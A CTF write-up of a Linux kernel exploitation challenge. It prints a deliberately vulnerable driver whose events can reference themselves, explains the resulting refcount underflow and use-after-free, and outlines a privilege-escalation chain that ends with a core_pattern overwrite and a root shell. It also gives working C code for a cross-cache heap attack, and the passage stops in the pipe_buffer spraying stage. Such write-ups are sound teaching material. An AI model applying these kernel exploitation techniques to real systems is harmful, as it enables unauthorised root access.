# Level 2 - not quite baby kernel (linux kernel pwn)

This was the most challenging of the 3 pwnables challenges, and I took about 2 weeks to solve it. It was especially hard given my lack of background in kernel pwn. Fortunately I eventually solved it (although not in the intended way :P)

Challenge files:

{% file src="<https://243380073-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FBIa0PcXGYuP6chd3J1Ry%2Fuploads%2FFKVWJSS1JE6IHzjMdrNn%2Ffor_participant.zip?alt=media&token=b35fb88c-405d-4dcd-9548-399a446a6ef1>" %}

The challenge provides us with the following files:

```
- src
  - paradox.c
  - Makefile
- bzImage
- kernel_config_linux-6.12.38
- rootfs.cpio.gz
- start.sh  
```

Namely, `paradox.c` is the C code which implements the vulnerable linux driver, and the `Makefile` specifies how to compile it. `bzImage` is a compressed kernel image file, `kernel_config_linux-6.12.38` specifies all the config options of the linux kernel, `rootfs.cpio.gz` is the compressed filesystem, and `start.sh` runs the kernel.

Before delving into `paradox.c` let's cover some setup first:

We start by inspecting `start.sh` to understand the protections the kernel has:

```sh
#!/bin/sh

cd "$(dirname "$0")" || exit 1
qemu-system-x86_64 -m 128M \
	-monitor /dev/null \
	-serial stdio \
	-smp cores=2 \
	-kernel ./bzImage \
	-initrd ./rootfs.cpio.gz \
	-nographic \
	--append "console=ttyS0 kaslr loglevel=2" \
	-nographic \
	-cpu kvm64,+smap,+smep \
	-enable-kvm 
```

We can see that kaslr is enabled (which means that kernel functions are at a randomised address), and smap and smep are enabled. This means that when in kernel mode, we cannot use data from user pages, and we also cannot run code in user pages.

To make it easier to debug, you should disable kaslr temporarily, and add `-s` to tell QEMU to open a GDB server on tcp port 1234, and `-no-reboot` and `-no-shutdown` so we can stop and see when a kernel crash occurs. Your `start.sh` will now look like this:

```sh
#!/bin/sh

cd "$(dirname "$0")" || exit 1
qemu-system-x86_64 -m 128M \
	-monitor /dev/null \
	-serial stdio \
	-smp cores=2 \
	-kernel ./bzImage \
	-initrd ./rootfs.cpio.gz \
	-nographic \
	--append "console=ttyS0 nokaslr loglevel=2" \
	-nographic \
	-cpu kvm64,+smap,+smep \
	-enable-kvm \
	-s \
	-no-reboot \
	-no-shutdown
```

To decompress `rootfs.cpio.gz` into an actual folder we can use the below `decompress.sh`:

```sh
#!/bin/sh

mkdir rootfs
cd rootfs
cp ../rootfs.cpio.gz .
gunzip ./rootfs.cpio.gz
cpio -idm < ./rootfs.cpio
rm rootfs.cpio
```

Now I prepare my workflow to compile exploit C code and re-compress the filesystem back into `rootfs.cpio.gz`, using `mycompress.sh` and `compress.sh`.

`mycompress.sh`:

```sh
gcc -O2 -lpthread -static src/solve.c -o src/solve 
mv src/solve rootfs/solve
./compress.sh
```

`compress.sh`:

```sh
cd rootfs
find . -print0 \
| cpio --null -ov --format=newc \
| gzip -9 > rootfs.cpio.gz
mv ./rootfs.cpio.gz ../

```

Now that the prep work is done, let's look at `paradox.c`:

{% code lineNumbers="true" %}

```c
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/fs.h>
#include <linux/refcount.h>
#include <linux/cdev.h>
#include <linux/slab.h>
#include <linux/miscdevice.h>
#include <linux/uaccess.h>
#include <linux/atomic.h>
#include <linux/list.h>
#include <linux/mutex.h> 

#define DEVICE_NAME "paradox_engine"

MODULE_LICENSE("GPL");


struct temporal_event {
	u64 event_id;
	refcount_t causal_weight;
	struct temporal_event *causal_dependency;
	char description[64];
	struct list_head timeline_node;
	struct timeline *parent_timeline;
};

struct timeline {
	u64 timeline_id;
	atomic64_t next_event_id;
	struct list_head events_head;
	struct temporal_event *caused_by_event;
	struct list_head session_node;
};

struct paradox_session_data {
	struct mutex lock; 
	struct list_head all_timelines;
	atomic64_t next_timeline_id;
};

static struct kmem_cache *temporal_event_cache;

static void event_erase_from_reality(struct temporal_event *event);

static void event_get(struct temporal_event *event) { if (event) refcount_inc(&event->causal_weight); }
static void event_put(struct temporal_event *event) { if (event && refcount_dec_and_test(&event->causal_weight)) event_erase_from_reality(event); }
static void event_erase_from_reality(struct temporal_event *event) {
	//	printk(KERN_INFO "paradox_engine: Erasing event '%s' (Timeline %llu, Event %llu) from reality.\n", event->description, event->parent_timeline->timeline_id, event->event_id);
	kfree(event);
}

static struct temporal_event* find_event_in_timeline(struct timeline *tl, u64 event_id) {
	struct temporal_event *ev;
	if (!tl) return NULL;
	list_for_each_entry(ev, &tl->events_head, timeline_node) {
		if (ev->event_id == event_id) return ev;
	}
	return NULL;
}

#define PARADOX_CREATE_TIMELINE _IOWR('k', 1, struct paradox_timeline_req)
#define PARADOX_CREATE_EVENT _IOWR('k', 2, struct paradox_event_req)

struct paradox_timeline_req {
	u64 cause_timeline_id, cause_event_id;
	u64 new_timeline_id;
};
struct paradox_event_req {
	u64 target_timeline_id;
	u64 cause_event_id;
	char description[64];
	u64 new_event_id;
};

static int paradox_engine_open(struct inode *inode, struct file *filp) {
	struct paradox_session_data *session = kzalloc(sizeof(*session), GFP_KERNEL);
	if (!session) return -ENOMEM;

	mutex_init(&session->lock);

	INIT_LIST_HEAD(&session->all_timelines);
	atomic64_set(&session->next_timeline_id, 0);

	struct timeline *primordial_tl = kzalloc(sizeof(*primordial_tl), GFP_KERNEL);
	if (!primordial_tl) { kfree(session); return -ENOMEM; }
	primordial_tl->timeline_id = atomic64_fetch_add(1, &session->next_timeline_id);
	atomic64_set(&primordial_tl->next_event_id, 0);
	INIT_LIST_HEAD(&primordial_tl->events_head);
	list_add_tail(&primordial_tl->session_node, &session->all_timelines);

	struct temporal_event *first_cause = kmem_cache_alloc(temporal_event_cache, GFP_KERNEL|__GFP_ZERO);
	if (!first_cause) { kfree(primordial_tl); kfree(session); return -ENOMEM; }
	first_cause->event_id = atomic64_fetch_add(1, &primordial_tl->next_event_id);
	refcount_set(&first_cause->causal_weight, 1);
	strcpy(first_cause->description, "The First Cause");
	first_cause->parent_timeline = primordial_tl;
	list_add_tail(&first_cause->timeline_node, &primordial_tl->events_head);

	filp->private_data = session;
	//printk(KERN_INFO "paradox_engine: New private universe created with Local Causality law.\n");
	return 0;
}

static int paradox_engine_release(struct inode *inode, struct file *filp) {
	struct paradox_session_data *session = filp->private_data;
	struct timeline *tl, *tmp_tl;
	struct temporal_event *event, *tmp_event;
	//printk(KERN_INFO "paradox_engine: Collapsing private universe.\n");
	list_for_each_entry(tl, &session->all_timelines, session_node) {
		list_for_each_entry_safe(event, tmp_event, &tl->events_head, timeline_node) {
			struct temporal_event *cause = event->causal_dependency;
			list_del(&event->timeline_node);
			while (cause) {
				struct temporal_event *next_in_chain = cause->causal_dependency;
				event_put(cause);
				cause = next_in_chain;
			}
			event->causal_dependency = NULL;
			event_put(event);
		}
	}
	//printk(KERN_INFO "paradox_engine: Final cleanup of all timelines.\n");
	list_for_each_entry_safe(tl, tmp_tl, &session->all_timelines, session_node) {
		list_del(&tl->session_node);
		if (tl->caused_by_event) event_put(tl->caused_by_event);
		kfree(tl);
	}
	kfree(session);
	return 0;
}

static long paradox_engine_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) {
	struct paradox_session_data *session = filp->private_data;
	struct timeline *target_tl = NULL, *tmp_tl;
	long ret = 0;

	mutex_lock(&session->lock);

	switch (cmd) {
		case PARADOX_CREATE_TIMELINE:
			{
				struct paradox_timeline_req req;
				if (copy_from_user(&req, (void __user *)arg, sizeof(req))) { ret = -EFAULT; break; }
				struct temporal_event *cause_event = NULL;
				list_for_each_entry(tmp_tl, &session->all_timelines, session_node) {
					if(tmp_tl->timeline_id == req.cause_timeline_id) {
						cause_event = find_event_in_timeline(tmp_tl, req.cause_event_id);
						if(cause_event) break;
					}
				}
				if (!cause_event) { ret = -EINVAL; break; }
				struct timeline *new_tl = kzalloc(sizeof(*new_tl), GFP_KERNEL);
				if (!new_tl) { ret = -ENOMEM; break; }
				new_tl->timeline_id = atomic64_fetch_add(1, &session->next_timeline_id);
				atomic64_set(&new_tl->next_event_id, 0);
				INIT_LIST_HEAD(&new_tl->events_head);
				new_tl->caused_by_event = cause_event;
				event_get(cause_event);
				list_add_tail(&new_tl->session_node, &session->all_timelines);
				req.new_timeline_id = new_tl->timeline_id;
				if (copy_to_user((void __user *)arg, &req, sizeof(req))) { ret = -EFAULT; break; }
				break;
			}

		case PARADOX_CREATE_EVENT:
			{
				struct paradox_event_req req;
				if (copy_from_user(&req, (void __user *)arg, sizeof(req))) { ret = -EFAULT; break; }
				list_for_each_entry(tmp_tl, &session->all_timelines, session_node) {
					if (tmp_tl->timeline_id == req.target_timeline_id) { target_tl = tmp_tl; break; }
				}
				if (!target_tl) { ret = -EINVAL; break; }
				struct temporal_event *event = kmem_cache_alloc(temporal_event_cache, GFP_KERNEL|__GFP_ZERO);
				if (!event) { ret = -ENOMEM; break; }
				event->event_id = atomic64_fetch_add(1, &target_tl->next_event_id);
				refcount_set(&event->causal_weight, 1);
				strncpy(event->description, req.description, sizeof(event->description) - 1);
				event->parent_timeline = target_tl;
				list_add_tail(&event->timeline_node, &target_tl->events_head);
				if (req.cause_event_id != 0) {
					struct temporal_event *cause_event = find_event_in_timeline(target_tl, req.cause_event_id);
					if (cause_event) {
						event->causal_dependency = cause_event;
						event_get(cause_event);
					}
				}
				req.new_event_id = event->event_id;
				if (copy_to_user((void __user *)arg, &req, sizeof(req))) { ret = -EFAULT; break; }
				break;
			}
		default:
			ret = -EINVAL;
	}

	mutex_unlock(&session->lock);
	return ret;
}

static const struct file_operations fops = {
	.owner = THIS_MODULE,
	.open = paradox_engine_open,
	.release = paradox_engine_release,
	.unlocked_ioctl = paradox_engine_ioctl,
};

static struct miscdevice dev;

static int dev_init(void) {
	dev.minor = MISC_DYNAMIC_MINOR;
	dev.name = DEVICE_NAME;
	dev.fops = &fops;
	dev.mode = 0644;
	temporal_event_cache = kmem_cache_create("temporal_event_cache",
			sizeof(struct temporal_event),
			0, SLAB_PANIC, NULL);
	if (!temporal_event_cache) {
		printk(KERN_ERR "paradox_engine: Failed to create slab cache.\n");
		return -ENOMEM;
	}

	if (misc_register(&dev)) {
		return -1;
	}


	return 0;
}

static void dev_cleanup(void) {
	misc_deregister(&dev);
}


module_init(dev_init);
module_exit(dev_cleanup);


```

{% endcode %}

To be honest, it's quite alot of code, so let me summarise what's going on:

There are 3 main structs, `temporal_event` and `timeline`. They have the following structures:

```c
struct temporal_event {
	u64 event_id;
	refcount_t causal_weight;
	struct temporal_event *causal_dependency;
	char description[64];
	struct list_head timeline_node;
	struct timeline *parent_timeline;
};

struct timeline {
	u64 timeline_id;
	atomic64_t next_event_id;
	struct list_head events_head;
	struct temporal_event *caused_by_event;
	struct list_head session_node;
};

struct paradox_session_data {
	struct mutex lock; 
	struct list_head all_timelines;
	atomic64_t next_timeline_id;
};
```

### paradox\_engine\_open

Each file descriptor that you open when you do `open("/dev/paradox_engine", O_RDONLY)` invokes `paradox_engine_open`, which instantiates the session by associating a `paradox_session_data` with it. We know this because it does&#x20;

```c
filp->private_data = session;
```

It also instantiates a `timeline` object and calls it the primordial timeline, and creates a `temporal_event` called the first cause. Each session has a list of all timelines, while each timeline has an event it is caused by and a list of events within that timeline.&#x20;

As for the temporal event, note the following:

{% code overflow="wrap" %}

```c
struct temporal_event *first_cause = kmem_cache_alloc(temporal_event_cache, GFP_KERNEL|__GFP_ZERO);
```

{% endcode %}

The temporal event comes from its own dedicated cache. This will be important later.

Also note that this event has its refcount `causal_weight` set to 1.

### paradox\_engine\_ioctl

This function essentially specifies the ways in which a user can interact with the device. In particular, they can choose to either create a timeline or create an event.

#### Create timeline

Request structure:

```c
struct paradox_timeline_req {
	u64 cause_timeline_id, cause_event_id;
	u64 new_timeline_id;
};
```

ioctl code:

```c
struct paradox_timeline_req req;
if (copy_from_user(&req, (void __user *)arg, sizeof(req))) { ret = -EFAULT; break; }
struct temporal_event *cause_event = NULL;
list_for_each_entry(tmp_tl, &session->all_timelines, session_node) {
	if(tmp_tl->timeline_id == req.cause_timeline_id) {
		cause_event = find_event_in_timeline(tmp_tl, req.cause_event_id);
		if(cause_event) break;
	}
}
if (!cause_event) { ret = -EINVAL; break; }
struct timeline *new_tl = kzalloc(sizeof(*new_tl), GFP_KERNEL);
if (!new_tl) { ret = -ENOMEM; break; }
new_tl->timeline_id = atomic64_fetch_add(1, &session->next_timeline_id);
atomic64_set(&new_tl->next_event_id, 0);
INIT_LIST_HEAD(&new_tl->events_head);
new_tl->caused_by_event = cause_event;
event_get(cause_event);
list_add_tail(&new_tl->session_node, &session->all_timelines);
req.new_timeline_id = new_tl->timeline_id;
if (copy_to_user((void __user *)arg, &req, sizeof(req))) { ret = -EFAULT; break; }
break;
```

When creating a timeline, a user must specify the timeline and its event which caused this new timeline to occur. The timeline is created with the next id available, and it is added to the session. The event that caused this timeline gets `event_get` called on it, which basically increases the refcount `causal_weight`. If the request was successful, the new timeline's id is returned to the user.

#### Create event

Request structure:

```c
struct paradox_event_req {
	u64 target_timeline_id;
	u64 cause_event_id;
	char description[64];
	u64 new_event_id;
};
```

ioctl code:

```c
struct paradox_event_req req;
if (copy_from_user(&req, (void __user *)arg, sizeof(req))) { ret = -EFAULT; break; }
list_for_each_entry(tmp_tl, &session->all_timelines, session_node) {
	if (tmp_tl->timeline_id == req.target_timeline_id) { target_tl = tmp_tl; break; }
}
if (!target_tl) { ret = -EINVAL; break; }
struct temporal_event *event = kmem_cache_alloc(temporal_event_cache, GFP_KERNEL|__GFP_ZERO);
if (!event) { ret = -ENOMEM; break; }
event->event_id = atomic64_fetch_add(1, &target_tl->next_event_id);
refcount_set(&event->causal_weight, 1);
strncpy(event->description, req.description, sizeof(event->description) - 1);
event->parent_timeline = target_tl;
list_add_tail(&event->timeline_node, &target_tl->events_head);
if (req.cause_event_id != 0) {
	struct temporal_event *cause_event = find_event_in_timeline(target_tl, req.cause_event_id);
	if (cause_event) {
		event->causal_dependency = cause_event;
		event_get(cause_event);
	}
}
req.new_event_id = event->event_id;
if (copy_to_user((void __user *)arg, &req, sizeof(req))) { ret = -EFAULT; break; }
break;
```

Once again the event is allocated from the `temporal_event_cache` and its data is zeroed. Its refcount is initialised to 1. The user's `description` is copied to the object, and the event that caused this event to happened has its refcount increased by 1. If `req.cause_event_id` is 0, however, that means that the new event isn't caused by another event. If the request is successful, the driver returns the event's id to the user.

### Looking for the vuln

For some background, refcount bugs are rather common, and are usually used to count how many times an object was referred to. When its refcount drops to 0 it is usually freed. This case is no different: When event\_put is called on an object and its refcount goes from 1 -> 0, the object is freed:

```c
static void event_get(struct temporal_event *event) { if (event) refcount_inc(&event->causal_weight); }
static void event_put(struct temporal_event *event) { if (event && refcount_dec_and_test(&event->causal_weight)) event_erase_from_reality(event); }
static void event_erase_from_reality(struct temporal_event *event) {
	//	printk(KERN_INFO "paradox_engine: Erasing event '%s' (Timeline %llu, Event %llu) from reality.\n", event->description, event->parent_timeline->timeline_id, event->event_id);
	kfree(event);
}
```

It actually took me some time (and gpting) to figure out the vuln, but eventually I realised a problem: When we create a temporal event, the event is added to its timeline BEFORE  we run the following `if` block:

```c
// event is added to the target timeline first!
list_add_tail(&event->timeline_node, &target_tl->events_head);
// THEN we find its cause event and set it as its causal dependency
if (req.cause_event_id != 0) {
	struct temporal_event *cause_event = find_event_in_timeline(target_tl, req.cause_event_id);
	if (cause_event) {
		event->causal_dependency = cause_event;
		event_get(cause_event);
	}
}
```

This results in it being possible for an event to have itself as its causal dependency.

### paradox\_engine\_release

Let's see the implication of this in `paradox_engine_release`, which is called when the driver is closed:

```c
static int paradox_engine_release(struct inode *inode, struct file *filp) {
	struct paradox_session_data *session = filp->private_data;
	struct timeline *tl, *tmp_tl;
	struct temporal_event *event, *tmp_event;
	//printk(KERN_INFO "paradox_engine: Collapsing private universe.\n");
	list_for_each_entry(tl, &session->all_timelines, session_node) {
		list_for_each_entry_safe(event, tmp_event, &tl->events_head, timeline_node) {
			struct temporal_event *cause = event->causal_dependency;
			list_del(&event->timeline_node);
			while (cause) {
				struct temporal_event *next_in_chain = cause->causal_dependency;
				event_put(cause);
				cause = next_in_chain;
			}
			event->causal_dependency = NULL;
			event_put(event);
		}
	}
	//printk(KERN_INFO "paradox_engine: Final cleanup of all timelines.\n");
	list_for_each_entry_safe(tl, tmp_tl, &session->all_timelines, session_node) {
		list_del(&tl->session_node);
		if (tl->caused_by_event) event_put(tl->caused_by_event);
		kfree(tl);
	}
	kfree(session);
	return 0;
}
```

It iterates through each timeline. Within each timeline it iterates through each event, and walks its `cause = event->causal_dependency`, calling `event_put` every time it finds a new `cause`. Once that's done, the pointer to its `causal_dependency` is zeroed, and the event itself has `event_put` called on it.

Then it iterates through each timeline in the session, calling `event_put` on the event which caused the timeline. Finally the timeline is freed.&#x20;

Thereafter, the session is freed.

### Implications

If an event has itself as a `causal_dependency`, what happens is that when we close the driver, the loop

```c
while (cause) {
	struct temporal_event *next_in_chain = cause->causal_dependency;
	event_put(cause);
	cause = next_in_chain;
}
```

perpetually has the same event as its `cause`, and keeps calling `event_put` on it. Let's look at `event_put` again:

```c
static void event_put(struct temporal_event *event) { 
    if (event && refcount_dec_and_test(&event->causal_weight)) 
        event_erase_from_reality(event); 
}
static void event_erase_from_reality(struct temporal_event *event) {
	//	printk(KERN_INFO "paradox_engine: Erasing event '%s' (Timeline %llu, Event %llu) from reality.\n", event->description, event->parent_timeline->timeline_id, event->event_id);
	kfree(event);
}
```

What this means is that whenever the refcount `causal_weight` hits 0 the event gets kfreed. What happens if it goes below 0 (which occurs when the self-referring event gets freed)? Apparently, this causes the refcount to underflow to a value such as `0xC0000000` or `0xBFFFFFFF`. It DOES NOT immediately lead to a double-free, and the kfree will still only occur once.

## :bug: More tips for debugging

Before exploitation, you may also find the following helpful to make debugging easier:

* Using the linux source code for linux 6.12.38 from <https://cdn.kernel.org/pub/linux/kernel/v6.x/linux-6.12.38.tar.xz>, you should recompile the kernel with debugging symbols. Most CTF challenges (including this one) do not provide kernels with debugging symbols.
  * If you don't want to do this, you can also [use this tool](https://raw.githubusercontent.com/torvalds/linux/master/scripts/extract-vmlinux) to convert the compressed bzImage into an uncompressed vmlinux, then [use this tool](https://github.com/marin-m/vmlinux-to-elf) to convert the vmlinux to an elf. This should be able to recover most symbols to make debugging easier. Then, to debug, do `gdb ./kernelelf` then `target remote :1234` when your kernel is running
* Use the [bata24 gef debugger](https://app.gitbook.com/u/ZHOE1GQ1StU1IribR3BsE5zaRX92), it is ahead of pwndbg and the main gef fork. It comes with many features supporting kernel debugging. I found the commands `pagewalk-with-hints`, `slub-dump`, `xf` and `slab-contains` most helpful.
  * To easily find the victim object when debugging, all I needed to do was find its description using `xf "self-referring event"`

### Verifying trivial wins

Take note that there can actually be trivial leaks in kernel challenges via dmesg or kernel warnings or similar. However, in `init.sh` we see these two lines:

```shellscript
echo 1 > /proc/sys/kernel/dmesg_restrict
echo 2 > /proc/sys/kernel/kptr_restrict
```

so trivial leaks are unfortunately out of the question.

I also tried to look for n-days in the given linux kernel itself, but unfortunately couldn't find any.

## Exploitation

Here are the high-level steps my exploit follows, which I will elaborate on later:

1. Perform a cross-cache attack on a self-referring event, ensuring that its page can get reclaimed by a CPU we control.
2. Spray `pipe_buffer` and reclaim the page with the page data of the `pipe_buffer`. Write bytes into all the `pipe_buffers` until we find which one's page reclaimed the victim, and the offset of the victim `temporal_event` in the page.
3. Spray ENLARGED `pipe_buffers` so that the `pipe_buffer` struct reclaims an order 9/10 page.
   1. Write 1 byte into each pipe fd then read 1 byte from it to fill the first pipe. Subsequent writes/splices will use the second pipe in the ring.
4. Reset the victim's refcount to `1`, and partially overwrite the victims `temporal_event *` to point to the previously reclaimed order 9/10 page. The infinite loop causes that page to get kfreed.
5. Reclaim the previously order 9/10 page by spraying `msg_msgseg`. This "releases" the infinite loop and the CPU that was previously running the loop. We not have a `msg_msgseg` overlapping multiple `pipe_buffers`.
6. Call syscall vmsplice to vDSO memory page into the `pipe_buffers` from stage 3. This causes the second pipe in the UAF'd page to have its `struct page` address point to a page responsible for kernel text.
7. Read from `msg_msgseg` to leak the address of the `page *` for kernel text.
8. Prepare a fake pipe buffer with `page` and `offset` value calculated point to the `core_pattern` `page`'s address and set `PIPE_BUF_FLAG_CAN_MERGE` for the pipe flags.
9. Reclaim the previously freed `msg_msgseg` by spraying `msg_msgseg` again, overwriting the second `pipe_buffer` in the UAF'd page with the `page *` for `core_pattern`.
10. Write to the `pipe_buffer` to overwrite `core_pattern`, and trigger a crash to get a root shell.

### Part 1. Cross-cache attack

Remember how earlier we said that temporal events are allocated using a dedicated cache because we do this?:

{% code overflow="wrap" %}

```c
struct temporal_event *event = kmem_cache_alloc(temporal_event_cache, GFP_KERNEL|__GFP_ZERO);
```

{% endcode %}

This makes exploitation more difficult because when we free a `temporal_event` the page still belongs in `temporal_event_cache` . When we then allocate other objects, they use pages from different caches. i.e. they will not make use of the freed page (and thus not use our victim object!)

But there is a technique called cross-cache attack which allows us to still make this happen. The cross-cache attack allows the victim page to be reclaimed by any other object, reopening more exploitation techniques!

To perform this technique, I found [these black hat slides](https://i.blackhat.com/Asia-24/Presentations/Asia-24-Wu-Game-of-Cross-Cache.pdf) particularly instructional. The gist of it is:

1. Pin task to a CPU
2. Drain partially free slabs
3. Allocate `objs_per_slab * (1 + cpu_partial)` objects (you can find these in `/sys/kernel/slab/temporal_event_cache/cpu_partial` and `/sys/kernel/slab/temporal_event_cache/objs_per_slab` )

```
/sys/kernel/slab/temporal_event_cache # cat cpu_partial
120
/sys/kernel/slab/temporal_event_cache # cat objs_per_slab
36
```

4. Allocate `objs_per_slab - 1` objects as pre-alloc objects
5. Allocate victim object
6. Allocate `objs_per_slab + 1` objects as post-alloc objects
7. Free victim, pre-alloc and post-alloc objects
8. Free one object per slab from step 2
   1. This triggers flushing of CPU partial list, allowing the victim slab to be released to the page allocator

At this point my code for the cross-cache attack looked something like this:

```c
#define OBJS_PER_SLAB 36
#define CPU_PARTIAL 120

...
static inline void pin_this_thread_to_cpu(int cpu) {
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    int rc = pthread_setaffinity_np(pthread_self(), sizeof(set), &set);
    if (rc) { errno = rc; perror("pthread_setaffinity_np"); exit(1); }
}
...
void *freefd2() {
    pin_this_thread_to_cpu(1);
    int cpu  = sched_getcpu(); 
    printf("[+] Closing thread running on cpu %d\n", cpu);
    close(fd2);
}
...
pin_this_thread_to_cpu(0);
fd2 = open(DEVICE_PATH, O_RDONLY);
fd1 = open(DEVICE_PATH, O_RDONLY);
// getchar();
if (fd1 < 0 || fd2 < 0) die("open /dev/paradox_engine");
printf("[+] devices opened\n");
printf("[*] creating events...\n");
// drain partially-free slabs
uint64_t partiallyfrees[CPU_PARTIAL + 1];
dev_create_timeline(fd2, 0, 0);
for (int i = 0; i < 34; i++) {
    uint64_t evt;
    evt = dev_create_event(fd2, 1, 0, "fd2event-pre");
    if (evt < 0) printf("[x] evt!");
}

for (int i = 0; i < OBJS_PER_SLAB * (1 + CPU_PARTIAL); i++) {
    uint64_t evt;
    if (i % OBJS_PER_SLAB == 0) {
        // want to free later
        evt = dev_create_event(fd1, 0, 0, "fd1event");
        partiallyfrees[i / OBJS_PER_SLAB] = evt;
    } else {
        evt = dev_create_event(fd2, 1, 0, "fd2event");
    }
    if (evt < 0) printf("[x] evt!");
}
printf("[+] Creating timelines with dependencies on partially freed slab objects\n");

for (int i = 0; i < CPU_PARTIAL + 1; i++) {
    uint64_t tl = dev_create_timeline(fd1, 0, partiallyfrees[i]);
    if (tl < 0) printf("[x] tl!");
}

uint64_t preallocs[OBJS_PER_SLAB - 1];
printf("[+] Creating pre-alloc objects\n");
for (int i = 0; i < OBJS_PER_SLAB - 1; i++) {
    // pre-alloc objects
    uint64_t evt = dev_create_event(fd1, 1, 0, "pre-alloc object");
    if (evt < 0) printf("[x] evt!");
    preallocs[i] = evt;
}

printf("[*] creating self-referential event...\n");
uint64_t e0 = dev_create_event(fd2, 0, 1, "self-referring event");
printf("[+] self-ref event created: e0=%llu\n", e0);
printf("[*] Freeing self-referential event...\n");

pthread_t t;
pthread_create(&t, NULL, freefd2, NULL);

printf("[+] Creating post-alloc objects\n");
uint64_t postallocs[OBJS_PER_SLAB + 1];

for (int i = 0; i < OBJS_PER_SLAB + 1; i++) {
    uint64_t evt = dev_create_event(fd1, 1, 0, "post-alloc object");
    if (evt < 0) printf("[x] evt!");
    postallocs[i] = evt;
}
// sleep(0.01)
printf("[+] Releasing pre-alloc and post-alloc objects and one obj per partially freed slab\n");
close(fd1);
...
```

Note that regardless of which fd you use to create events, they use the same cache and pages. Essentially the events created on fd2 would get freed first on cpu1 followed by the events created on fd1 which would get freed on cpu0.

&#x20;My intention was for the `(OBJS_PER_SLAB - 1) * CPU_PARTIAL` objects and the `self-referring event` to be freed first on cpu1. Thereafter, the `pre-alloc` and `post-alloc` objects would be free on cpu0.

This was a costly mistake, since freeing the self-referring event on cpu1 first causes the victim page to be on cpu1's per-cpu partial list, and cpu1 was the cpu with the infinite loop which I couldn't control.

:brain: The solution to this was quite simple: Instead of freeing the self-referring event first, free the pre-alloc and post-alloc objects first!

Here's the final working cross-cache code:

```c
void *freefd2() {
    pin_this_thread_to_cpu(1);
    int cpu  = sched_getcpu(); 
    printf("[+] Closing thread running on cpu %d\n", cpu);
    close(fd2);
}
...
void *fillcpu1() {
    pin_this_thread_to_cpu(1);
    printf("[+] Filling cpu1 partial list...\n");
    for (int i = 0; i < OBJS_PER_SLAB * (1 + CPU_PARTIAL); i++) {
        uint64_t evt;
        if (i % 2 == 0) {
            // want to free later
            evt = dev_create_event(fd4, 0, 0, "fd4event-cpu1");
        } else {
            evt = dev_create_event(fd3, 0, 0, "fd3event-cpu1");
        }
    }
}
...
void *freecpu1() {
    pin_this_thread_to_cpu(1);
    printf("[+] Filling cpu1 partial list (2)...\n");
    close(fd4);
}
...
pin_this_thread_to_cpu(0);
fd1 = open(DEVICE_PATH, O_RDONLY); // for cpu0 pre-alloc obj, post-alloc obj and the partial page objs to be freed
fd2 = open(DEVICE_PATH, O_RDONLY); // uncontrollable infinite loop
fd3 = open(DEVICE_PATH, O_RDONLY); // fd3 is never closed
fd4 = open(DEVICE_PATH, O_RDONLY); // for filling cpu1 partial list
fd5 = open(DEVICE_PATH, O_RDONLY); // for filling cpu1 partial list
// getchar();
printf("[+] devices opened\n");
printf("[+] creating events...\n");

uint64_t partiallyfrees[CPU_PARTIAL + 1];
for (int i = 0; i < OBJS_PER_SLAB * (1 + CPU_PARTIAL); i++) {
    uint64_t evt;
    if (i % 2 == 0) {
        // want to free later
        evt = dev_create_event(fd1, 0, 0, "fd1event-cpu0");
        partiallyfrees[i / OBJS_PER_SLAB] = evt;
    } else {
        evt = dev_create_event(fd3, 0, 0, "fd3event-cpu0");
    }
    if (evt < 0) printf("[x] evt!");
}

pthread_t t1;
pthread_create(&t1, NULL, fillcpu1, NULL);
pthread_join(t1, NULL);
printf("[+] Creating timelines with dependencies on partially freed slab objects\n");

for (int i = 0; i < (CPU_PARTIAL + 1); i++) {
    uint64_t tl = dev_create_timeline(fd1, 0, partiallyfrees[i]);
    if (tl < 0) printf("[x] tl!");
}

uint64_t preallocs[OBJS_PER_SLAB - 1];
printf("[+] Creating pre-alloc objects\n");
for (int i = 0; i < OBJS_PER_SLAB - 1; i++) {
    // pre-alloc objects
    uint64_t evt;
    if (i % 2) {
        evt = dev_create_event(fd1, 0, 0, "pre-alloc object");
    } else {
        evt = dev_create_event(fd5, 0, 0, "pre-alloc object");
    }
    if (evt < 0) printf("[x] evt!");
    preallocs[i] = evt;
}

printf("[+] creating self-referential event...\n");
uint64_t e0 = dev_create_event(fd2, 0, 1, "self-referring event");
printf("[+] self-ref event created: e0=%llu\n", e0);

printf("[+] Creating post-alloc objects\n");
uint64_t postallocs[OBJS_PER_SLAB + 1];

for (int i = 0; i < OBJS_PER_SLAB + 1; i++) {
    uint64_t evt;
    if (i % 2) {
        evt = dev_create_event(fd1, 0, 0, "post-alloc object");
    } else {
        evt = dev_create_event(fd5, 0, 0, "post-alloc object");
    }
    if (evt < 0) printf("[x] evt!");
    postallocs[i] = evt;
}

close(fd5);
// pause();
pthread_t t2;
pthread_create(&t2, NULL, freecpu1, NULL);
pthread_join(t2, NULL);
printf("[+] Freeing self-referential event...\n");
pthread_t t;
pthread_create(&t, NULL, freefd2, NULL);
// sleep(5); // bro...
// block until the other thread enters
sleep(1);
printf("[+] Releasing pre-alloc and post-alloc objects and one obj per partially freed slab\n");
close(fd1);
```

Half of the pre- and post-alloc objects are in fd1, while half are in fd5. The self-referring object uses fd2.

:exclamation: The key difference is: I first close fd5 to free half the pre- and post- alloc objects in CPU 0, to get the victim slab in CPU 0's partial list

With this, after the cross-cache attack my victim page was in the free area and could be reclaimed by CPU 0!

### Part 2. Spraying pipe\_buffer to reclaim victim page

When we inspect the victim page, this is what we will see:

```
...
0xffff888006494bd0|+0x0bd0|+378: 0x0000000000000001 <- victim event id
0xffff888006494bd8|+0x0bd8|+379: 0x00000000bfffffff <- victim refcount
0xffff888006494be0|+0x0be0|+380: 0xffff888006494bd0 <- victim's dependency (itself)
0xffff888006494be8|+0x0be8|+381: 0x6665722d666c6573 'self-referring event'
0xffff888006494bf0|+0x0bf0|+382: 0x6520676e69727265 'erring event'
0xffff888006494bf8|+0x0bf8|+383: 0x00000000746e6576 ('vent'?)
0xffff888006494c00|+0x0c00|+384: 0x0000000000000000
0xffff888006494c08|+0x0c08|+385: 0xa36fb47ca526c672 <- mangled freelist pointer
0xffff888006494c10|+0x0c10|+386: 0x0000000000000000
0xffff888006494c18|+0x0c18|+387: 0x0000000000000000
0xffff888006494c20|+0x0c20|+388: 0x0000000000000000
0xffff888006494c28|+0x0c28|+389: 0xdead000000000100
